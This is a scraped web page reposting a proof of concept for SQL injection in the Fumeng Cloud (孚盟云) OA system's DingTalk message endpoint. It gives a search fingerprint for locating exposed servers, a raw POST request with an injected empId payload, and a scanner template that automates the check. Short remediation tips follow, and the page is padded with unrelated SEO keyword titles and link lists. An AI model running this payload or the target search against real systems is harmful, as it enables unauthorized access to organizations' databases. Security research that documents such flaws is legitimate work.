当前位置: 首页 > news >正文

网站建设备案需要什么百度关键词价格排行榜

网站建设备案需要什么,百度关键词价格排行榜,网站开发国内外研究,创可贴在线设计平台》》》产品描述《《《 孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品,让用户可以用云模式实现信息化管理,让用户的异地办公更加流畅,大大降低中小企业在信息化上成本,用最小的投入享受大型企业级别的信息化…


》》》产品描述《《《

        孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品,让用户可以用云模式实现信息化管理,让用户的异地办公更加流畅,大大降低中小企业在信息化上成本,用最小的投入享受大型企业级别的信息化服务,使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。


》》》漏洞描述《《《

   Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。


》》》搜索语句《《《

body="hidLicResult" && body="hidProductID"


》》》漏洞复现《《《

POC

POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest
Content-Length: 51action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

yaml

id: 孚盟云oa AjaxSendDingdingMessage sql注入漏洞info:name: Potential SQL Injection in Dingding Message Endpointauthor: Kelichenseverity: highdescription: |Potential SQL Injection vulnerability in the Dingding Message Endpoint.This template attempts to exploit the vulnerability by injecting a SQL payload.reference:- http:- raw:- |POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1Host: {{Hostname}}Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequestContent-Length: 51action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "Microsoft SQL Server"- "MySQL"- "PostgreSQL"- "Oracle"part: body

》》》修复建议《《《

如非必要,禁止公网访问该系统

通过防火墙等安全设备设置访问策略,设置白名单访问。

升级产品到最新版本


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://www.sczhlp.com/news/134181/

相关文章:

  • 简述网站建设过程步骤wordpress 美拍插件
  • 网站推广效果的评价怎么搭建自己的网站
  • 河北省住房和城乡建设厅网站打不开微信小程序开发教程pdf
  • 关于咖啡厅网站建设的论文如东网站建设
  • 如何从下载的视频查到原网站外包做网站怎么拿源代码
  • 陕西网站seo江苏省网站备案查询系统
  • 建设银行网站e动终端网站改版 删除栏目
  • 国内做企业英文网站用什么cmswordpress浏览速度
  • 西安网站优化维护jquery购物网站
  • 中国室内设计联盟官方网站入口交通局网站模板
  • 企业门户网站是什么意思精美网页模板
  • 同ip多域名做同行业网站高端+旅游+网站建设
  • 沈阳网站建设设计什么是网络营销推广三板斧
  • 公司做网站需要给百度交钱吗电子商务网站建设备案须知
  • 网站的建设与运营专业济宁专业建网站
  • 国企网站建设需要注意上海专业网站建设市场
  • 一个网站有多少页面xp做网站
  • 网站开发培训达内青岛网站建设方案外包
  • 外贸网站建设公司排名静态网站开发课程模板
  • swipe类网站网站建设推广平台
  • 网站模板怎么进网站后台管理系统多少钱
  • 万网云服务器怎么上传网站吗喀什市建设局网站查证件
  • Winform无边框窗体拖动功能实现
  • 学校招聘教师网站建设怎么注册公司域名
  • 网站建设方案可行性国际网站如何推做推广
  • 哪个网站可以接针织衫做单南宁网站设计多少钱
  • 旅游景点网站策划书网站开发语言net
  • 赣榆网站制作wordpress o2o主题
  • 网站续费管理系统汾阳做网站
  • 营销型网站建设一般包含哪些内容保定专业网站建设开发公司